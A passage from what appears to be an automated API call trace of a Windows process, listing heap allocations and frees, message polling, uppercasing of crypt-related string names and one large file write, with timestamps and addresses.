dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0173.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0173.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0173.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0173.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0173.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0173.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0173.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0173.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0173.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0173.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0173.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0173.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0173.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0173.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0173.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0173.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0173.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0173.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0173.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0173.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0173.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0173.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0173.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0173.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0173.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0173.646] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0173.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0173.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0173.646] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0173.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0173.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff48 [0173.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0173.646] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0173.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff48 | out: hHeap=0x970000) returned 1 [0173.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0173.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0173.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0173.646] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0173.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0173.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0173.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0173.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0173.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0173.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0173.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0173.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0173.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0173.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0173.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0173.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0173.647] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0173.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0173.647] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0173.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0173.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0173.647] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0173.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0173.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0173.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0173.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0173.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0173.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0173.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0173.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0173.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0173.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0173.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0173.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf0c08) returned 0x43ef020 [0173.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0173.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0173.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf0c08) returned 0x41e9020 [0173.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0173.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0173.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x43ef020 | out: hHeap=0x970000) returned 1 [0173.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0173.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0173.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0173.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0173.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0173.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf0c08) returned 0x43e7020 [0173.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x41e9020 | out: hHeap=0x970000) returned 1 [0173.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0173.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0173.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf0c08) returned 0x41e4020 [0173.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x43e7020 | out: hHeap=0x970000) returned 1 [0173.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0173.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0173.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0173.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0173.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0173.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0173.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0173.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0173.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0173.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0173.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0173.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0173.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0173.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0173.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0173.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0173.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0173.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0173.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0173.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0173.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0173.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0173.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0173.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0173.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0173.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0173.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0173.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0173.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0173.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0173.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0173.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0173.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0173.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x40e1020 | out: hHeap=0x970000) returned 1 [0173.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0173.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0173.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0173.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0173.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0173.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0173.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0173.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0173.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0173.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0173.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0173.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0173.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0173.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0173.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0173.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0173.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0173.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3fe0020 | out: hHeap=0x970000) returned 1 [0173.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0173.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0173.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0173.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0173.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0173.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x42e1020 | out: hHeap=0x970000) returned 1 [0173.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0173.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0173.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0173.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0173.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0173.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0173.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0173.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0173.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0173.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0173.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0173.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3eee020 | out: hHeap=0x970000) returned 1 [0173.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0173.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0173.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0173.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0173.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0173.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0173.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0173.981] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3de2020 | out: hHeap=0x970000) returned 1 [0173.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0173.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0173.988] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf0c08) returned 0x3def020 [0174.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x41e4020 | out: hHeap=0x970000) returned 1 [0174.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0174.079] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0174.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0174.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0174.079] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0174.079] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0174.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0174.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0174.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0174.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0174.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0174.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0174.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf0c08) returned 0x3efe020 [0174.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0174.097] WriteFile (in: hFile=0x2a0, lpBuffer=0x3efe020*, nNumberOfBytesToWrite=0xf0c08, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x3efe020*, lpNumberOfBytesWritten=0x8cf5e4*=0xf0c08, lpOverlapped=0x0) returned 1 [0174.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0174.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3efe020 | out: hHeap=0x970000) returned 1 [0174.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0174.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0174.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0174.235] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0174.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0174.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0174.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0174.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0174.235] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0174.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0174.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0174.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0174.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0174.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0174.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0174.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0174.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0174.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0174.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0174.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0174.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0174.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0174.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0174.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0174.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0174.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0174.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0174.236] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0174.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0174.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0174.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0174.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ec8 [0174.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0174.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0174.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0174.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0174.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0174.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0174.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0174.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0174.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0174.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0174.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0174.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0174.237] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0174.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 